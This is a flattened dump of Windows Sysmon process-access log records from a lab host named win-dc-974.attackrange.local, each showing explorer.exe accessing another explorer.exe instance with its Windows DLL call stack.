16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 